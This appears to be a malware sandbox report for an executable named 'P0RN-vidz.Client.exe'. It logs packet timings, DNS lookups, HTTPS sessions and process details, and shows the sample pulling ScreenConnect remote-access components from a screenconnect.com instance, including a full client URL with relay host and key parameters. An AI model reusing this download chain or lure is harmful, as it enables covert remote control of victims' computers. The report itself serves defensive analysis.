                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.203695059 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.229115009 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.229130030 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.229197979 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.229209900 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.231867075 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.252378941 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.252393961 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.252453089 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.252460957 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.252547979 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.269051075 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.269064903 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.269135952 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.269145012 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.269270897 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.285725117 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.285739899 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.285784960 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.285793066 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.285851955 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.301219940 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.301234961 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.301285028 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.301295996 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.301455975 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.313971996 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.313987970 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.314050913 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.314059019 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.314116955 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.324692965 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.324707985 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.324765921 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.324774981 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.325129986 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.333678961 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.333693981 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.333745956 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.333753109 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.333784103 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.341449022 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.341464043 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.341520071 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.341532946 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.341658115 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.351011992 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.351027966 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.351109028 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.351124048 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.351165056 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.358854055 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.358870029 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.358930111 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.358938932 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.359045029 CET49787443192.168.2.5147.75.81.6
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.367837906 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:08.367851019 CET44349787147.75.81.6192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:40.372669935 CET44349874147.75.81.4192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:40.372704029 CET44349874147.75.81.4192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:53.233155966 CET49905443192.168.2.5147.75.81.4
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:53.233226061 CET44349905147.75.81.4192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:53.233300924 CET49905443192.168.2.5147.75.81.4
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:53.235912085 CET49905443192.168.2.5147.75.81.4
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:53.235940933 CET44349905147.75.81.4192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:23:53.235996962 CET44349905147.75.81.4192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:24:09.503200054 CET49941443192.168.2.5147.75.81.4
                                                                                                                                                                                                                                        Dec 20, 2024 18:24:09.503248930 CET44349941147.75.81.4192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:24:09.503319025 CET49941443192.168.2.5147.75.81.4
                                                                                                                                                                                                                                        Dec 20, 2024 18:24:09.507076979 CET49941443192.168.2.5147.75.81.4
                                                                                                                                                                                                                                        Dec 20, 2024 18:24:09.507096052 CET44349941147.75.81.4192.168.2.5
                                                                                                                                                                                                                                        Dec 20, 2024 18:24:09.507163048 CET44349941147.75.81.4192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 20, 2024 18:22:26.586549997 CET | 64191 | 53 | 192.168.2.5 | 1.1.1.1
Dec 20, 2024 18:22:26.899703026 CET | 53 | 64191 | 1.1.1.1 | 192.168.2.5
Dec 20, 2024 18:22:56.737891912 CET | 53770 | 53 | 192.168.2.5 | 1.1.1.1
Dec 20, 2024 18:22:56.943176031 CET | 53 | 53770 | 1.1.1.1 | 192.168.2.5
Dec 20, 2024 18:23:01.810013056 CET | 54928 | 53 | 192.168.2.5 | 1.1.1.1
Dec 20, 2024 18:23:02.120120049 CET | 53 | 54928 | 1.1.1.1 | 192.168.2.5
Dec 20, 2024 18:23:15.274945021 CET | 49180 | 53 | 192.168.2.5 | 1.1.1.1
Dec 20, 2024 18:23:15.559389114 CET | 53 | 49180 | 1.1.1.1 | 192.168.2.5
Dec 20, 2024 18:23:52.910103083 CET | 63471 | 53 | 192.168.2.5 | 1.1.1.1
Dec 20, 2024 18:23:53.213187933 CET | 53 | 63471 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 20, 2024 18:22:26.586549997 CET | 192.168.2.5 | 1.1.1.1 | 0x4ae8 | Standard query (0) | koidesfac.screenconnect.com | A (IP address) | IN (0x0001) | false
Dec 20, 2024 18:22:56.737891912 CET | 192.168.2.5 | 1.1.1.1 | 0x3ec9 | Standard query (0) | koidesfac.screenconnect.com | A (IP address) | IN (0x0001) | false
Dec 20, 2024 18:23:01.810013056 CET | 192.168.2.5 | 1.1.1.1 | 0x43a | Standard query (0) | koidesfac.screenconnect.com | A (IP address) | IN (0x0001) | false
Dec 20, 2024 18:23:15.274945021 CET | 192.168.2.5 | 1.1.1.1 | 0x3ae9 | Standard query (0) | instance-l7g4dh-relay.screenconnect.com | A (IP address) | IN (0x0001) | false
Dec 20, 2024 18:23:52.910103083 CET | 192.168.2.5 | 1.1.1.1 | 0x786f | Standard query (0) | instance-l7g4dh-relay.screenconnect.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 20, 2024 18:22:26.899703026 CET | 1.1.1.1 | 192.168.2.5 | 0x4ae8 | No error (0) | koidesfac.screenconnect.com | server-nixd2d85b70-web.screenconnect.com | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 20, 2024 18:22:26.899703026 CET | 1.1.1.1 | 192.168.2.5 | 0x4ae8 | No error (0) | server-nixd2d85b70-web.screenconnect.com | - | 147.75.81.6 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 18:22:33.358398914 CET | 1.1.1.1 | 192.168.2.5 | 0xc5ec | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 20, 2024 18:22:33.358398914 CET | 1.1.1.1 | 192.168.2.5 | 0xc5ec | No error (0) | fp2e7a.wpc.phicdn.net | - | 192.229.221.95 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 18:22:34.577539921 CET | 1.1.1.1 | 192.168.2.5 | 0x818d | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 20, 2024 18:22:34.577539921 CET | 1.1.1.1 | 192.168.2.5 | 0x818d | No error (0) | fp2e7a.wpc.phicdn.net | - | 192.229.221.95 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 18:22:56.943176031 CET | 1.1.1.1 | 192.168.2.5 | 0x3ec9 | No error (0) | koidesfac.screenconnect.com | server-nixd2d85b70-web.screenconnect.com | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 20, 2024 18:22:56.943176031 CET | 1.1.1.1 | 192.168.2.5 | 0x3ec9 | No error (0) | server-nixd2d85b70-web.screenconnect.com | - | 147.75.81.6 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 18:23:02.120120049 CET | 1.1.1.1 | 192.168.2.5 | 0x43a | No error (0) | koidesfac.screenconnect.com | server-nixd2d85b70-web.screenconnect.com | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 20, 2024 18:23:02.120120049 CET | 1.1.1.1 | 192.168.2.5 | 0x43a | No error (0) | server-nixd2d85b70-web.screenconnect.com | - | 147.75.81.6 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 18:23:15.559389114 CET | 1.1.1.1 | 192.168.2.5 | 0x3ae9 | No error (0) | instance-l7g4dh-relay.screenconnect.com | server-nixd2d85b70-relay.screenconnect.com | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 20, 2024 18:23:15.559389114 CET | 1.1.1.1 | 192.168.2.5 | 0x3ae9 | No error (0) | server-nixd2d85b70-relay.screenconnect.com | - | 147.75.81.4 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 18:23:53.213187933 CET | 1.1.1.1 | 192.168.2.5 | 0x786f | No error (0) | instance-l7g4dh-relay.screenconnect.com | server-nixd2d85b70-relay.screenconnect.com | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 20, 2024 18:23:53.213187933 CET | 1.1.1.1 | 192.168.2.5 | 0x786f | No error (0) | server-nixd2d85b70-relay.screenconnect.com | - | 147.75.81.4 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                                        • koidesfac.screenconnect.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49705 | 147.75.81.6 | 443 | 3060 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 17:22:29 UTC | 655 | OUT | GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=instance-l7g4dh-relay.screenconnect.com&p=443&s=efdde9f7-b36a-4379-90c6-ca6ccaf179c1&k=BgIAAACkAABSU0ExAAgAAAEAAQDVP1a20vKqeqe1KQFemomLm8erwhLpJp1KQnVFAxXxR%2fAz3hz0vYkeQulpCwRe9iWW0dRuBiCd4QvTjxbScJC8nEMvMHnm4MPjY73L4nGpV97oo264zQQyspkhXqNGR2iSOY6rpzvLKPopO9fWOecUGy8yJBQwR0HDB%2bV%2bDADDDeUKlr%2f%2bImJA6eJFZoh3jSThaEua7aIpOZ4Is8GgHX8wrKM81nNiWScf%2b7MB7KKIDRJByiihgKgCgnWSCJjLVCupmRFoab8THk%2fLIjFCP2pmaJw8v7WwUOPs029lZKG3850zwZwC0SO4vLP6yZA1QFVZK7Jr%2fnahgqnKFENgMAm3&r=&i=USTest%20191224%20140 HTTP/1.1
                                                                                                                                                                                                                                        Host: koidesfac.screenconnect.com
                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                        Connection: Keep-Alive
2024-12-20 17:22:29 UTC | 238 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                        Content-Length: 118570
                                                                                                                                                                                                                                        Content-Type: application/x-ms-application; charset=utf-8
                                                                                                                                                                                                                                        X-Robots-Tag: noindex
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 17:22:28 GMT
                                                                                                                                                                                                                                        Connection: close
2024-12-20 17:22:29 UTC | 16146 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2=


Session ID: 1
Source IP: 192.168.2.5
Source Port: 49710
Destination IP: 147.75.81.6
Destination Port: 443
PID: 3060
Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp: 2024-12-20 17:22:32 UTC, Bytes transferred: 109, Direction: OUT
GET /Bin/ScreenConnect.Client.manifest HTTP/1.1
Host: koidesfac.screenconnect.com
Accept-Encoding: gzip

Timestamp: 2024-12-20 17:22:33 UTC, Bytes transferred: 341, Direction: IN
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17858
Content-Type: application/octet-stream
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="ScreenConnect.Client.manifest"; filename*=UTF-8''ScreenConnect.Client.manifest
Date: Fri, 20 Dec 2024 17:22:33 GMT
Connection: close


Session ID: 2
Source IP: 192.168.2.5
Source Port: 49722
Destination IP: 147.75.81.6
Destination Port: 443
PID: 3060
Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp: 2024-12-20 17:22:42 UTC, Bytes transferred: 135, Direction: OUT
GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1
Host: koidesfac.screenconnect.com
Accept-Encoding: gzip
Connection: Keep-Alive

Timestamp: 2024-12-20 17:22:43 UTC, Bytes transferred: 345, Direction: IN
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 95512
Content-Type: application/octet-stream
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="ScreenConnect.ClientService.exe"; filename*=UTF-8''ScreenConnect.ClientService.exe
Date: Fri, 20 Dec 2024 17:22:42 GMT
Connection: close


Session ID: 3
Source IP: 192.168.2.5
Source Port: 49727
Destination IP: 147.75.81.6
Destination Port: 443
PID: 3060
Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp: 2024-12-20 17:22:44 UTC, Bytes transferred: 119, Direction: OUT
GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1
Host: koidesfac.screenconnect.com
Accept-Encoding: gzip

Timestamp: 2024-12-20 17:22:45 UTC, Bytes transferred: 361, Direction: IN
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61208
Content-Type: application/octet-stream
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="ScreenConnect.WindowsBackstageShell.exe"; filename*=UTF-8''ScreenConnect.WindowsBackstageShell.exe
Date: Fri, 20 Dec 2024 17:22:45 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49728 | 147.75.81.6 | 443 | 3060 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 17:22:47 UTC | 123 | OUT | GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1
Host: koidesfac.screenconnect.com
Accept-Encoding: gzip
2024-12-20 17:22:47 UTC | 367 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 266
Content-Type: application/octet-stream
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="ScreenConnect.WindowsFileManager.exe.config"; filename*=UTF-8''ScreenConnect.WindowsFileManager.exe.config
Date: Fri, 20 Dec 2024 17:22:47 GMT
Connection: close
2024-12-20 17:22:47 UTC | 266 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49735 | 147.75.81.6 | 443 | 3060 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 17:22:49 UTC | 118 | OUT | GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1
Host: koidesfac.screenconnect.com
Accept-Encoding: gzip
2024-12-20 17:22:49 UTC | 357 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 266
Content-Type: application/octet-stream
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="ScreenConnect.WindowsClient.exe.config"; filename*=UTF-8''ScreenConnect.WindowsClient.exe.config
Date: Fri, 20 Dec 2024 17:22:48 GMT
Connection: close
2024-12-20 17:22:49 UTC | 266 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49742 | 147.75.81.6 | 443 | 3060 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 17:22:51 UTC | 126 | OUT | GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1
Host: koidesfac.screenconnect.com
Accept-Encoding: gzip
2024-12-20 17:22:51 UTC | 373 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 266
Content-Type: application/octet-stream
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="ScreenConnect.WindowsBackstageShell.exe.config"; filename*=UTF-8''ScreenConnect.WindowsBackstageShell.exe.config
Date: Fri, 20 Dec 2024 17:22:50 GMT
Connection: close
2024-12-20 17:22:51 UTC | 266 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49750 | 147.75.81.6 | 443 | 3060 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 17:22:52 UTC | 116 | OUT | GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1
Host: koidesfac.screenconnect.com
Accept-Encoding: gzip
2024-12-20 17:22:53 UTC | 355 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 81688
Content-Type: application/octet-stream
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="ScreenConnect.WindowsFileManager.exe"; filename*=UTF-8''ScreenConnect.WindowsFileManager.exe
Date: Fri, 20 Dec 2024 17:22:52 GMT
Connection: close
2024-12-20 17:22:53 UTC | 16029 | IN | Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL*"0@^ `@ `@


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        8192.168.2.549756147.75.81.64433060C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-12-20 17:22:55 UTC104OUTGET /Bin/ScreenConnect.Client.dll HTTP/1.1
Host: koidesfac.screenconnect.com
Accept-Encoding: gzip
2024-12-20 17:22:56 UTC | 332 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 197120
Content-Type: application/octet-stream
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="ScreenConnect.Client.dll"; filename*=UTF-8''ScreenConnect.Client.dll
Date: Fri, 20 Dec 2024 17:22:55 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49763 | 147.75.81.6 | 443 | 3060 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-20 17:22:58 UTC | 129 | OUT | GET /Bin/ScreenConnect.Windows.dll HTTP/1.1
Host: koidesfac.screenconnect.com
Accept-Encoding: gzip
Connection: Keep-Alive
2024-12-20 17:22:59 UTC | 335 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 1726976
Content-Type: application/octet-stream
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="ScreenConnect.Windows.dll"; filename*=UTF-8''ScreenConnect.Windows.dll
Date: Fri, 20 Dec 2024 17:22:58 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49781 | 147.75.81.6 | 443 | 3060 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-20 17:23:03 UTC | 111 | OUT | GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1
Host: koidesfac.screenconnect.com
Accept-Encoding: gzip
2024-12-20 17:23:04 UTC | 346 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 602392
Content-Type: application/octet-stream
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="ScreenConnect.WindowsClient.exe"; filename*=UTF-8''ScreenConnect.WindowsClient.exe
Date: Fri, 20 Dec 2024 17:23:03 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 49787 | 147.75.81.6 | 443 | 3060 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-20 17:23:06 UTC | 126 | OUT | GET /Bin/ScreenConnect.Core.dll HTTP/1.1
Host: koidesfac.screenconnect.com
Accept-Encoding: gzip
Connection: Keep-Alive
2024-12-20 17:23:07 UTC | 328 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 549888
Content-Type: application/octet-stream
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="ScreenConnect.Core.dll"; filename*=UTF-8''ScreenConnect.Core.dll
Date: Fri, 20 Dec 2024 17:23:06 GMT
Connection: close
                                                                                                                                                                                                                                        Data Ascii: :{*(+&*.s*(<*"(+*(<*{(,{o{o-*(<*{(,{o{o-*.s*(<*(*.(fo*(<*{.*(<*^(fo{!o/Y*"}"*2{"o0*"}#*2{#
                                                                                                                                                                                                                                        2024-12-20 17:23:08 UTC16384INData Raw: 01 00 00 00 5b 01 be 02 a1 00 10 00 54 4d 00 00 66 3e 01 00 00 00 5b 01 bf 02 81 01 10 00 a3 f4 00 00 66 3e 01 00 35 00 5b 01 c2 02 01 01 00 00 a7 25 01 00 66 3e 01 00 c5 00 5c 01 c4 02 09 01 10 00 f5 30 00 00 66 3e 01 00 6d 00 6b 01 c4 02 81 01 10 00 24 2d 01 00 66 3e 01 00 35 00 6e 01 d1 02 09 01 10 00 f3 31 00 00 66 3e 01 00 6d 00 6e 01 d1 02 81 01 10 00 9b 2d 01 00 66 3e 01 00 35 00 6f 01 e2 02 01 01 00 00 08 3a 01 00 66 3e 01 00 c5 00 6f 01 e6 02 01 01 00 00 75 a4 00 00 66 3e 01 00 c5 00 82 01 e6 02 a1 00 10 00 90 06 01 00 66 3e 01 00 00 00 87 01 e6 02 81 01 10 00 d0 03 01 00 66 3e 01 00 35 00 87 01 e8 02 09 01 10 00 d1 27 00 00 66 3e 01 00 6d 00 87 01 ea 02 09 01 10 00 6d 31 00 00 66 3e 01 00 6d 00 88 01 ef 02 81 01 10 00 65 32 00 00 66 3e 01 00 35
                                                                                                                                                                                                                                        Data Ascii: [TMf>[f>5[%f>\0f>mk$-f>5n1f>mn-f>5o:f>ouf>f>f>5'f>mm1f>me2f>5


Session ID:12
Source IP:192.168.2.5
Source Port:49798
Destination IP:147.75.81.6
Destination Port:443
PID:3060
Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp:2024-12-20 17:23:09 UTC
Bytes transferred:111
Direction:OUT
Data:
GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1
                                                                                                                                                                                                                                        Host: koidesfac.screenconnect.com
                                                                                                                                                                                                                                        Accept-Encoding: gzip
Timestamp:2024-12-20 17:23:10 UTC
Bytes transferred:345
Direction:IN
Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                        Content-Length: 68608
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        X-Robots-Tag: noindex
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        Content-Disposition: attachment; filename="ScreenConnect.ClientService.dll"; filename*=UTF-8''ScreenConnect.ClientService.dll
                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 17:23:10 GMT
                                                                                                                                                                                                                                        Connection: close

                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                        Start time:12:22:24
                                                                                                                                                                                                                                        Start date:20/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\P0RN-vidz.Client.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\P0RN-vidz.Client.exe"
                                                                                                                                                                                                                                        Imagebase:0x370000
                                                                                                                                                                                                                                        File size:84'432 bytes
                                                                                                                                                                                                                                        MD5 hash:AF0D6501F817B8769618C6CBCA8B4F65
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:1
                                                                                                                                                                                                                                        Start time:12:22:24
                                                                                                                                                                                                                                        Start date:20/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                                                                                                                                                                                                                                        Imagebase:0x20c24d70000
                                                                                                                                                                                                                                        File size:24'856 bytes
